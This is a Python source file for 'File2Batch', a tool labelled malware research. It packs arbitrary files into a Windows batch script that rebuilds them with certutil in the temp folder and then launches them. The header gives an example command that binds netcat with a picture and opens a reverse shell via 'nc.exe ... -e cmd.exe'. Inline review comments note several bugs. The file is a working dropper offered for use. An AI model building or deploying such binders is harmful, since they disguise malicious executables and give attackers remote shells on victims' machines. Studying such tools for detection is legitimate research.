#-----------------------------------------------------------------------------------------------------------------------
# PHROZEN SAS (c) 2018 - www.phrozen.io
# Jean-Pierre LESUEUR ([email protected])
#
# Name : File2Batch
# Description : File Binder (Wrapper) using only Batch commands (.BAT output extension)
# Category : Malware Research
# Version : 0.1 (07/02/2018)
# Target OS : Windows XP->Windows 10 (32/64bit)
# License : MIT
#
# Example of command:
# python File2Batch.py -f "c:\tmp\nc.exe" -f "c:\tmp\cports.exe" -f "c:\tmp\test.jpg" -o "c:\tmp\test.bat" -c "nc.exe 127.0.0.1 1403 -e cmd.exe" -c "cports.exe" -c "test.jpg"
#
# This command builds a batch file that extracts netcat (nc.exe), Nirsoft Active Ports (cports) and a picture to the temp folder.
# When the batch file is launched, netcat opens a reverse shell to localhost; Active Ports and the picture are simply executed.
#-----------------------------------------------------------------------------------------------------------------------
import base64
import argparse
import os

# Command-line interface.
# argparse opens every '-f' input for reading ('rb') and the '-o' output for
# writing ('wt') while parsing; the code below only uses those handles for
# their .name/.mode and re-opens each path itself, so the handles argparse
# created are never closed explicitly.
parser = argparse.ArgumentParser(description='File2Batch')
parser.add_argument('-f', action="append", dest="srcFiles", metavar='in-file', type=argparse.FileType('rb'), required=True, help="File to be encoded in the output batch file (Support collection Ex: -f file1.exe -f file2.jpg -f [...])")
parser.add_argument('-o', action="store", dest="outFile", metavar='out-file', type=argparse.FileType('wt'), required=True, help="Output batch file (Encoded Files Container).")
# Each -c value is emitted as "start %TEMP%\<value>" in the generated batch,
# i.e. it is interpreted relative to %TEMP% (see the post-command loop below).
parser.add_argument('-c', action="append", dest="postCmds", required=False, default=[], help="Command Line to execute after extracting embedded files (Support collection Ex: -c command1 -c command2 -c [...])")
try:
    argv = parser.parse_args()
except IOError:
    # NOTE(review): parser.error() requires a message argument, so this handler
    # raises TypeError if it is ever reached. argparse normally reports a
    # FileType open failure itself (usage message + SystemExit) rather than
    # letting IOError escape parse_args(), so this branch is effectively dead.
    parser.error()
# Split a long string in chunks of 2000 characters | |
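def splitStr(str, size=2000):
    """Split a string into consecutive chunks of at most ``size`` characters.

    Used by the batch generator to keep every emitted ``echo`` line within the
    command-line length limitation. The last chunk may be shorter than
    ``size``; an empty string yields an empty list.

    Args:
        str: the string to split. The name shadows the ``str`` builtin; it is
            kept unchanged so existing callers are unaffected.
        size: maximum length of each chunk, must be positive. Defaults to the
            original hard-coded 2000.

    Returns:
        A list of substrings which, concatenated in order, reproduce ``str``.

    Raises:
        ValueError: if ``size`` is not a positive integer.
    """
    if size <= 0:
        raise ValueError("size must be a positive integer")
    return [str[i:i + size] for i in range(0, len(str), size)]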
# Assemble the output batch script in memory. For every input file the
# generated script (1) deletes any stale %temp%\<name>.b64, (2) re-creates it by
# appending the base64 text 2000 characters at a time via "echo|set /P",
# running "cls" after each append, and (3) runs "certutil -decode" to write
# %TEMP%\<original file name>. The .b64 staging file is not deleted after the
# decode, so it remains on disk as an artifact once the batch has run.
batchContent = "@echo off";
# NOTE(review): no "\n" follows "@echo off", so the first "del" command is
# appended to the same line instead of starting a new one.
# Embed each input file inside the output batch file
for inFile in argv.srcFiles:
    # Encode the file as base64 so it can be stored as text. The path argparse
    # already opened is re-opened here (same name/mode) and closed by the
    # with-statement; the handle argparse created is left open.
    with open(inFile.name, inFile.mode) as file:
        encodedFile64 = base64.b64encode(file.read()).decode('ascii')
    baseName = os.path.basename(inFile.name)
    # Staging path used by the batch: %temp%\<basename without extension>.b64
    tempFile = "%temp%\\" + os.path.splitext(baseName)[0] + ".b64"
    # Delete any previously extracted encoded file
    batchContent += "del " + tempFile + "\n"
    # Split the base64 text into 2000-character chunks (echo command length limitation)
    chunks = splitStr(encodedFile64)
    for chunk in chunks:
        # One append per chunk, each followed by "cls"
        batchContent += "echo|set /P =" + chunk + " >> " + tempFile + "& cls\n"
    # certutil decodes the staged .b64 file back into %TEMP%\<basename>
    batchContent += "certutil -decode " + tempFile + " %TEMP%\\" + baseName + "\n"
# Post-extraction commands: every -c value is launched with "start" and is
# prefixed with %TEMP%\, so it must name a file extracted above (plus arguments).
for command in argv.postCmds:
    batchContent += "start %TEMP%\\" + command + "\n"
# Write the final batch file (text mode, as argparse opened it)
with open(argv.outFile.name, argv.outFile.mode) as destBatch:
    destBatch.write(batchContent)